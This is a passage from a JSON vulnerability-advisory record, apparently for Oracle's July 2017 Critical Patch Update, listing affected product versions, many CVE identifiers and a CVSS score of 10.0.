"Primavera Unifier", "version": "16.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Allocation", "version": "15.0.1", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "15.0", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.3.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u151", "operator": "le"}, {"name": "Oracle Communications BRM", "version": "11.2.0.0.0", "operator": "le"}, {"name": "Primavera Gateway", "version": "16.1", "operator": "le"}, {"name": "OJVM", "version": "12.2.0.1", "operator": "le"}, {"name": "Oracle Retail Customer Insights", "version": "16.0", "operator": "le"}, {"name": "Real Application Clusters", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Configuration Manager", "version": "12.1.2.0.4", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.5.0.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Direct Banking", "version": "12.0.2", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.3.0", "operator": "le"}, {"name": "Oracle Enterprise Communications Broker", "version": "210", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "7.1.x", "operator": "le"}, {"name": "Oracle Policy Automation", "version": "12.1.1", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.3.2.1162", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.56", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.5.1.0", "operator": "le"}, {"name": "BI Publisher", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Tuxedo System and Applications Monitor", "version": "12.2.2.0.0", "operator": "le"}, {"name": "Oracle Service Bus", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.7.0.0", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.1", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "16.0.0", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.2.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.17", "operator": "le"}, {"name": "Oracle Hospitality Reporting and Analytics", "version": "9.0.0", "operator": "le"}, {"name": "Application Management Pack for Oracle E-Business Suite", "version": "12.1.0.4.0", "operator": "le"}, {"name": "MySQL Connectors", "version": "6.1.10", "operator": "le"}, {"name": "Oracle Web Analytics", "version": "12.2.6", "operator": "le"}, {"name": "Hospitality WebSuite8 Cloud Service", "version": "8.9.6", "operator": "le"}, {"name": "Oracle Hospitality Guest Access", "version": "4.2.1.0", "operator": "le"}], "cvelist": ["CVE-2017-10230", "CVE-2017-10226", "CVE-2017-10193", "CVE-2017-10063", "CVE-2017-10031", "CVE-2017-3562", "CVE-2015-5254", "CVE-2017-10228", "CVE-2017-10248", "CVE-2015-1792", "CVE-2014-3566", "CVE-2017-3637", "CVE-2017-10235", "CVE-2017-10088", "CVE-2015-0235", "CVE-2017-10171", "CVE-2017-10196", "CVE-2017-10239", "CVE-2017-10208", "CVE-2017-10231", "CVE-2017-3638", "CVE-2017-10192", "CVE-2017-10001", "CVE-2016-4431", "CVE-2014-1912", "CVE-2017-10211", "CVE-2016-4436", "CVE-2016-5385", "CVE-2017-10143", "CVE-2015-3197", "CVE-2017-10175", "CVE-2017-10202", "CVE-2017-10244", "CVE-2017-10179", "CVE-2017-3642", "CVE-2017-10028", "CVE-2017-10160", "CVE-2016-5019", "CVE-2017-10012", "CVE-2017-10246", "CVE-2017-10134", "CVE-2017-3529", "CVE-2016-6306", "CVE-2017-10229", "CVE-2015-1789", "CVE-2016-2183", "CVE-2017-10075", "CVE-2017-10147", "CVE-2017-10207", "CVE-2017-10113", "CVE-2016-4438", "CVE-2017-10149", "CVE-2017-5689", "CVE-2015-0286", "CVE-2017-10238", "CVE-2016-2178", "CVE-2017-10015", "CVE-2017-3639", "CVE-2017-10241", "CVE-2017-10141", "CVE-2017-10236", "CVE-2017-10069", "CVE-2017-10222", "CVE-2015-3195", "CVE-2017-10220", "CVE-2017-10087", "CVE-2016-2108", "CVE-2017-10250", "CVE-2017-3632", "CVE-2017-10204", "CVE-2013-2027", "CVE-2017-10036", "CVE-2016-3092", "CVE-2014-3571", "CVE-2016-4465", "CVE-2017-10093", "CVE-2017-10064", "CVE-2016-6302", "CVE-2017-3652", "CVE-2017-10076", "CVE-2017-10198", "CVE-2017-10095", "CVE-2017-10006", "CVE-2017-10247", "CVE-2017-10119", "CVE-2017-10234", "CVE-2017-10169", "CVE-2017-3646", "CVE-2017-3648", "CVE-2017-10128", "CVE-2016-2177", "CVE-2017-10121", "CVE-2017-10213", "CVE-2017-10043", "CVE-2017-10144", "CVE-2014-0224", "CVE-2017-10209", "CVE-2016-0635", "CVE-2016-2105", "CVE-2017-10106", "CVE-2017-10186", "CVE-2017-10123", "CVE-2016-4433", "CVE-2017-10052", "CVE-2017-10032", "CVE-2017-10005", "CVE-2015-8607", "CVE-2017-10224", "CVE-2016-2107", "CVE-2016-7055", "CVE-2017-10150", "CVE-2017-10168", "CVE-2017-10232", "CVE-2015-7501", "CVE-2017-10170", "CVE-2017-3649", "CVE-2017-10022", "CVE-2015-3253", "CVE-2017-10107", "CVE-2017-3731", "CVE-2017-10183", "CVE-2016-6307", "CVE-2017-10243", "CVE-2017-5638", "CVE-2016-2834", "CVE-2017-10215", "CVE-2017-10023", "CVE-2017-10242", "CVE-2017-10048", "CVE-2017-10079", "CVE-2016-6308", "CVE-2017-10145", "CVE-2017-10195", "CVE-2017-10070", "CVE-2016-2180", "CVE-2017-10142", "CVE-2017-10104", "CVE-2017-10062", "CVE-2017-10210", "CVE-2017-10201", "CVE-2017-10044", "CVE-2017-10133", "CVE-2017-5651", "CVE-2017-3645", "CVE-2017-10020", "CVE-2017-5647", "CVE-2015-8608", "CVE-2017-10085", "CVE-2016-5388", "CVE-2017-10184", "CVE-2016-2109", "CVE-2017-10255", "CVE-2017-10199", "CVE-2017-3633", "CVE-2017-10082", "CVE-2017-10126", "CVE-2017-10030", "CVE-2017-10135", "CVE-2016-2181", "CVE-2017-3647", "CVE-2017-10008", "CVE-2017-10021", "CVE-2017-10217", "CVE-2016-6304", "CVE-2017-10132", "CVE-2017-10136", "CVE-2017-10187", "CVE-2017-10212", "CVE-2017-3732", "CVE-2016-5386", "CVE-2017-10057", "CVE-2017-10094", "CVE-2017-10252", "CVE-2017-10218", "CVE-2017-10038", "CVE-2017-10191", "CVE-2017-10205", "CVE-2017-3644", "CVE-2017-10101", "CVE-2017-10249", "CVE-2017-10146", "CVE-2017-10237", "CVE-2017-10108", "CVE-2017-10090", "CVE-2016-1979", "CVE-2017-3643", "CVE-2017-10049", "CVE-2017-10004", "CVE-2017-10041", "CVE-2016-2381", "CVE-2016-4430", "CVE-2017-10103", "CVE-2017-10219", "CVE-2017-10061", "CVE-2015-1788", "CVE-2017-10129", "CVE-2017-10025", "CVE-2017-10180", "CVE-2017-10221", "CVE-2017-10019", "CVE-2017-10024", "CVE-2017-10010", "CVE-2017-10185", "CVE-2017-10189", "CVE-2017-10035", "CVE-2017-10111", "CVE-2017-10117", "CVE-2017-10100", "CVE-2017-10013", "CVE-2016-7052", "CVE-2017-10091", "CVE-2017-10178", "CVE-2017-10096", "CVE-2017-10045", "CVE-2017-10240", "CVE-2017-10016", "CVE-2017-10157", "CVE-2017-10040", "CVE-2017-10131", "CVE-2016-1950", "CVE-2017-10071", "CVE-2017-10254", "CVE-2017-10083", "CVE-2017-10003", "CVE-2011-2730", "CVE-2017-3651", "CVE-2017-10110", "CVE-2017-3650", "CVE-2017-3641", "CVE-2017-10097", "CVE-2017-10073", "CVE-2017-10002", "CVE-2017-10105", "CVE-2017-10253", "CVE-2017-10017", "CVE-2017-10056", "CVE-2017-10115", "CVE-2017-3635", "CVE-2017-10047", "CVE-2017-10046", "CVE-2016-1181", "CVE-2017-10114", "CVE-2017-10058", "CVE-2017-10039", "CVE-2015-1790", "CVE-2017-10181", "CVE-2017-10027", "CVE-2017-10206", "CVE-2017-10245", "CVE-2016-6305", "CVE-2016-6303", "CVE-2017-10216", "CVE-2016-5387", "CVE-2017-10223", "CVE-2017-10233", "CVE-2017-10116", "CVE-2017-10200", "CVE-2017-10148", "CVE-2017-5650", "CVE-2017-10214", "CVE-2016-2182", "CVE-2017-10067", "CVE-2017-10078", "CVE-2017-10000", "CVE-2017-10092", "CVE-2017-10256", "CVE-2017-10257", "CVE-2017-10156", "CVE-2017-10074", "CVE-2017-10182", "CVE-2017-10059", "CVE-2017-10098", "CVE-2017-10053", "CVE-2017-10018", "CVE-2015-0254", "CVE-2017-10029", "CVE-2017-3653", "CVE-2015-7940", "CVE-2017-10137", "CVE-2017-10174", "CVE-2017-10225", "CVE-2017-10173", "CVE-2017-3640", "CVE-2017-10177", "CVE-2017-10081", "CVE-2016-3506", "CVE-2017-3636", "CVE-2017-10120", "CVE-2017-10258", "CVE-2017-10112", "CVE-2017-10042", "CVE-2017-10176", "CVE-2017-10122", "CVE-2017-10188", "CVE-2016-2179", "CVE-2017-10089", "CVE-2017-10109", "CVE-2017-10086", "CVE-2016-2106", "CVE-2017-3634", "CVE-2017-10130", "CVE-2017-10118", "CVE-2016-6814", "CVE-2017-10007", "CVE-2017-10080", "CVE-2017-10084", "CVE-2015-1791", "CVE-2017-10009", "CVE-2017-10125", "CVE-2016-6309", "CVE-2017-10072", "CVE-2017-10251", "CVE-2017-10102", "CVE-2017-10172", "CVE-2017-10011"], "modified": "2017-07-18T00:00:00", "id": "ORACLE:CPUJUL2017-3236622", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}